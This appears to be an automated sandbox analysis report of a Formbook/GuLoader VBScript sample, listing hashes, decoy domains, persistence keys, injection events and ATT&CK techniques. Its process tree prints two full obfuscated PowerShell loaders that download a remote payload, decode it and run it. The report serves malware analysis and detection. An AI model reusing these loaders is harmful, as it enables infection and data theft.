formbook | aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a

General

Target

aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a.vbs
Size

10KB
MD5

83741a566ed8044f4692b4070986ecb9
SHA1

921fa0b4bbe043a6a2a9b972bceab1088acda6f5
SHA256

aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a
SHA512

a4449f4ec76b25d0a8802afb93791c4522b1fcd14401349172d57ca93817a249b6fa8df2119b76ea3f76a9826592e54de17f0012b9d24d3fcc07bce7fa37bbde
SSDEEP

192:2M+7O579hFNNFU4wlr4ZRR/038AVVtkfLda+V9+ZMoce5QmDRs4ngSN+:2M+7O57dFU4wlr4r038AVQfL4+SZt13w

Score

10^/10

formbook guloader tt15 downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

tt15

Decoy

wholeplant.online

pornimmersive.site

gelcreativecollabs.com

novanewsbrasil.com

prefabhomes2024th.space

stelautosrl.online

wellnessmindfulhealth.com

qhgly.lol

thefutureshub.com

compk5l.info

insurance-offers.com

de-solarroof.today

pn-pasarwajo.com

rachelelice.com

inkninsight.com

innoviewclinical.com

austrofoods.com

mayanlanguagesaccess.co

ablaiserver.com

staffcanteencook200.buzz

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Formbook payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1976-42-0x0000000000400000-0x0000000000581000-memory.dmp	formbook
behavioral1/memory/1976-45-0x0000000000400000-0x0000000000581000-memory.dmp	formbook
behavioral1/memory/2840-55-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook
behavioral1/memory/2840-58-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

cmmon32.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	cmmon32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\-ZH8KLGP4FB = "C:\\Program Files (x86)\\windows mail\\wab.exe"	cmmon32.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 2252 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1976 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2252 powershell.exe
1976 wab.exe

flow	pid	process
3	2252	powershell.exe

pid	process
1976	wab.exe

pid	process
2252	powershell.exe
1976	wab.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exewab.execmmon32.exe

description	pid	process	target process
PID 2252 set thread context of 1976	2252	powershell.exe	wab.exe
PID 1976 set thread context of 1380	1976	wab.exe	Explorer.EXE
PID 2840 set thread context of 1380	2840	cmmon32.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

cmmon32.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	cmmon32.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exewab.execmmon32.exe

pid	process
2168	powershell.exe
2252	powershell.exe
1976	wab.exe
1976	wab.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exewab.execmmon32.exe

pid process

2252 powershell.exe
1976 wab.exe
1976 wab.exe
1976 wab.exe
2840 cmmon32.exe
2840 cmmon32.exe
2840 cmmon32.exe
2840 cmmon32.exe

pid	process
2252	powershell.exe
1976	wab.exe
1976	wab.exe
1976	wab.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe
2840	cmmon32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exewab.execmmon32.exe

description	pid	process
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	1976	wab.exe
Token: SeDebugPrivilege	2840	cmmon32.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WScript.exepowershell.exepowershell.exeExplorer.EXEcmmon32.exe

description	pid	process	target process
PID 2360 wrote to memory of 2168	2360	WScript.exe	powershell.exe
PID 2360 wrote to memory of 2168	2360	WScript.exe	powershell.exe
PID 2360 wrote to memory of 2168	2360	WScript.exe	powershell.exe
PID 2168 wrote to memory of 2252	2168	powershell.exe	powershell.exe
PID 2168 wrote to memory of 2252	2168	powershell.exe	powershell.exe
PID 2168 wrote to memory of 2252	2168	powershell.exe	powershell.exe
PID 2168 wrote to memory of 2252	2168	powershell.exe	powershell.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 2252 wrote to memory of 1976	2252	powershell.exe	wab.exe
PID 1380 wrote to memory of 2840	1380	Explorer.EXE	cmmon32.exe
PID 1380 wrote to memory of 2840	1380	Explorer.EXE	cmmon32.exe
PID 1380 wrote to memory of 2840	1380	Explorer.EXE	cmmon32.exe
PID 1380 wrote to memory of 2840	1380	Explorer.EXE	cmmon32.exe
PID 2840 wrote to memory of 580	2840	cmmon32.exe	Firefox.exe
PID 2840 wrote to memory of 580	2840	cmmon32.exe	Firefox.exe
PID 2840 wrote to memory of 580	2840	cmmon32.exe	Firefox.exe
PID 2840 wrote to memory of 580	2840	cmmon32.exe	Firefox.exe
PID 2840 wrote to memory of 580	2840	cmmon32.exe	Firefox.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. ';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. ';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"
4⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:580

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IXQ5BQ8004DI3KJTEFJG.temp
Filesize
7KB

MD5
80274af2de95959267131fc5e327f715

SHA1
63014c63e0209890371de1df704127d73568a00e

SHA256
bea9049aec8e8bcc177ebed3e0b120d67c1647ab8f61f5742afbbc2e0b45e49f

SHA512
a72036d134dbb0be2e73e1c6836ece4887bfec12afb850c15c64fef10fa854b15e74e9a222e2cc69a1f78fffe66fca15bf776ae73c41e19230dfbc2337285f34

Download Submit
memory/1380-47-0x0000000006D60000-0x0000000006EF2000-memory.dmp

Filesize
1.6MB

Download
memory/1976-37-0x0000000000FA0000-0x00000000029E5000-memory.dmp

Filesize
26.3MB

Download
memory/1976-56-0x0000000000FA0000-0x00000000029E5000-memory.dmp

Filesize
26.3MB

Download
memory/1976-54-0x0000000077780000-0x0000000077929000-memory.dmp

Filesize
1.7MB

Download
memory/1976-46-0x0000000000170000-0x0000000000184000-memory.dmp

Filesize
80KB

Download
memory/1976-45-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/1976-44-0x000000001E3E0000-0x000000001E6E3000-memory.dmp

Filesize
3.0MB

Download
memory/1976-42-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/1976-41-0x00000000779A6000-0x00000000779A7000-memory.dmp

Filesize
4KB

Download
memory/1976-39-0x0000000077970000-0x0000000077A46000-memory.dmp

Filesize
856KB

Download
memory/1976-38-0x0000000077780000-0x0000000077929000-memory.dmp

Filesize
1.7MB

Download
memory/2168-20-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2168-4-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2168-22-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-23-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-24-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-5-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2168-7-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-49-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2168-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2168-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2168-9-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-10-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2168-21-0x0000000002E60000-0x0000000002EE0000-memory.dmp

Filesize
512KB

Download
memory/2252-14-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2252-29-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2252-33-0x0000000077780000-0x0000000077929000-memory.dmp

Filesize
1.7MB

Download
memory/2252-16-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2252-15-0x00000000737C0000-0x0000000073D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-40-0x0000000006CF0000-0x0000000008735000-memory.dmp

Filesize
26.3MB

Download
memory/2252-32-0x0000000006CF0000-0x0000000008735000-memory.dmp

Filesize
26.3MB

Download
memory/2252-13-0x00000000737C0000-0x0000000073D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-43-0x00000000737C0000-0x0000000073D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-30-0x0000000006CF0000-0x0000000008735000-memory.dmp

Filesize
26.3MB

Download
memory/2252-31-0x00000000056D0000-0x00000000056D1000-memory.dmp

Filesize
4KB

Download
memory/2252-36-0x0000000077970000-0x0000000077A46000-memory.dmp

Filesize
856KB

Download
memory/2252-28-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2252-48-0x0000000006CF0000-0x0000000008735000-memory.dmp

Filesize
26.3MB

Download
memory/2252-27-0x00000000737C0000-0x0000000073D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-25-0x00000000737C0000-0x0000000073D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2252-26-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2840-53-0x0000000000A10000-0x0000000000A1D000-memory.dmp

Filesize
52KB

Download
memory/2840-52-0x0000000000A10000-0x0000000000A1D000-memory.dmp

Filesize
52KB

Download
memory/2840-57-0x0000000001FB0000-0x00000000022B3000-memory.dmp

Filesize
3.0MB

Download
memory/2840-55-0x0000000000080000-0x00000000000AF000-memory.dmp

Filesize
188KB

Download
memory/2840-58-0x0000000000080000-0x00000000000AF000-memory.dmp

Filesize
188KB

Download
memory/2840-63-0x0000000000940000-0x00000000009D3000-memory.dmp

Filesize
588KB

Download
memory/2840-68-0x0000000000940000-0x00000000009D3000-memory.dmp

Filesize
588KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads